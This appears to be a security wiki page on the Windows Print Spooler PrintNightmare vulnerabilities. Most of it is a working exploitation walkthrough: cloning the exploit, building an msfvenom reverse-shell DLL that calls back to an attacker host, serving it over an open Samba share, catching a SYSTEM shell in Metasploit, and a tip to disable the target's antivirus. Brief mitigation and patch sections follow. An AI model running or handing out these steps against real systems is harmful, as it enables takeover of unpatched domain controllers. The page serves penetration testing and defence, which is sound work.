CVE-2021-1675-and-CVE-2021-34527-PrintNightmare
Jump to navigation
Jump to search
Vulnerability
This post details 2 vulnerabilities (Remote Code Execution and Privilege Escalation) affecting Windows Print Spooler.
- CVE-2021-1675
- CVE-2021-34527
Long story short, Microsoft released a fix during the 2021 June monthly updates, to address CVE-2021-1675, that they qualified as a local privilege escalation (LPE).
End of June 2021, a group of Chinese researchers published an analysis that they called "PrintNightmare", where they demonstrated how they could exploit it remotely (RCE). They didn't know that they were actually targetting another vulnerability, CVE-2021-34527.
Microsoft requalified the initial flaw as Remote Code Execution (RCE).
Proof of Concept
Download
Prerequisites
The exploit relies on a modified version of impacket that you will need to download prior to running the exploit. It is recommended to run it in a virtual environment.
$ pip3 uninstall impacket $ git clone https://github.com/cube0x0/impacket $ cd impacket $ python3 ./setup.py install
Exploit
$ git clone https://github.com/cube0x0/CVE-2021-1675.git $ cd CVE-2021-1675/ $ python3 CVE-2021-1675.py -h
Confirm that the DC is vulnerable
If the below command returns a result, the target is likely vulnerable.
$ rpcdump.py @172.16.169.135 | grep MS-RPRN
Protocol: [MS-RPRN]: Print System Remote Protocol
Generate the DLL
The exploit relies on the injection of a DLL. For the PoC, we'll generate a reverse shell to our Kali box.
$ cd /tmp/ $ msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=172.16.169.130 LPORT=443 -o addCube.dll
Below is an example of rudimentary Samba share configuration file (/etc/samba/smb.conf)
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
Start Samba:
$ sudo systemctl start smbd.service
Start a listener
┌──(kali㉿kali)-[/data/tmp] └─$ msfconsole -q msf6 > use multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp PAYLOAD => windows/x64/shell_reverse_tcp msf6 exploit(multi/handler) > set LHOST 172.16.169.130 LHOST => 172.16.169.130 msf6 exploit(multi/handler) > set LPORT 443 LPORT => 443 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 172.16.169.130:443
Run the exploit
Note
You may need to disable the anti-virus on the DC to run the exploit. Else, it will trigger an alert and the exploit will fail.
┌──(kali㉿kali)-[/data/tmp/CVE-2021-1675] └─$ python3 CVE-2021-1675.py 'my.domain/my.user:[email protected]' '\\172.16.169.130\smb\addCube.dll' [*] Connecting to ncacn_np:172.16.169.135[\PIPE\spoolss] [+] Bind OK [+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_2097e02ea77b432e\Amd64\UNIDRV.DLL [*] Executing \\172.16.169.130\smb\addCube.dll [*] Try 1... [*] Stage0: 0 [*] Try 2... [*] Stage0: 0 [*] Try 3... Traceback (most recent call last): File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 568, in writeFile return self._SMBConnection.writeFile(treeId, fileId, data, offset) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1650, in writeFile written = self.write(treeId, fileId, writeData, writeOffset, len(writeData)) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1358, in write if ans.isValidAnswer(STATUS_SUCCESS): File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3structs.py", line 454, in isValidAnswer raise smb3.SessionError(self['Status'], self) impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.) During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/data/tmp/CVE-2021-1675/CVE-2021-1675.py", line 180, in <module> main(dce, pDriverPath,options.share) File "/data/tmp/CVE-2021-1675/CVE-2021-1675.py", line 84, in main resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx return dce.request(request) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 856, in request self.call(request.opnum, request, uuid) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 845, in call return self.send(DCERPC_RawCall(function, body.getData(), uuid)) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1298, in send self._transport_send(data) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1235, in _transport_send self._transport.send(rpc_packet.get_packet(), forceWriteAndx = forceWriteAndx, forceRecv = forceRecv) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 535, in send self.__smb_connection.writeFile(self.__tid, self.__handle, data) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 570, in writeFile raise SessionError(e.get_error_code(), e.get_error_packet()) impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)
You should now have a reverse shell in the listener windows, and be SYSTEM:
[*] Started reverse TCP handler on 172.16.169.130:443
[*] Command shell session 1 opened (172.16.169.130:443 -> 172.16.169.135:50246) at 2021-07-07 13:28:35 +0200
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
Mitigation
Disable the Spooler service
Run the following Powershell commands:
Stop-Service Spooler
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f
Uninstall Print-Services
You can also uninstall the Print services completely (Powershell commands)
Uninstall-WindowsFeature Print-Services
Patch
With the Windows updates, the RCE is no longer working:
┌──(kali㉿kali)-[/data/tmp/CVE-2021-1675] └─$ python3 CVE-2021-1675.py 'my.domain/my.user:[email protected]' '\\172.16.169.130\smb\addCube.dll' [*] Connecting to ncacn_np:172.16.169.135[\PIPE\spoolss] [+] Bind OK [+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_2097e02ea77b432e\Amd64\UNIDRV.DLL [*] Executing \\172.16.169.130\smb\addCube.dll [*] Try 1... Traceback (most recent call last): File "/data/tmp/CVE-2021-1675/CVE-2021-1675.py", line 176, in <module> main(dce, pDriverPath, options.share) File "/data/tmp/CVE-2021-1675/CVE-2021-1675.py", line 84, in main resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx return dce.request(request) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request raise exception impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied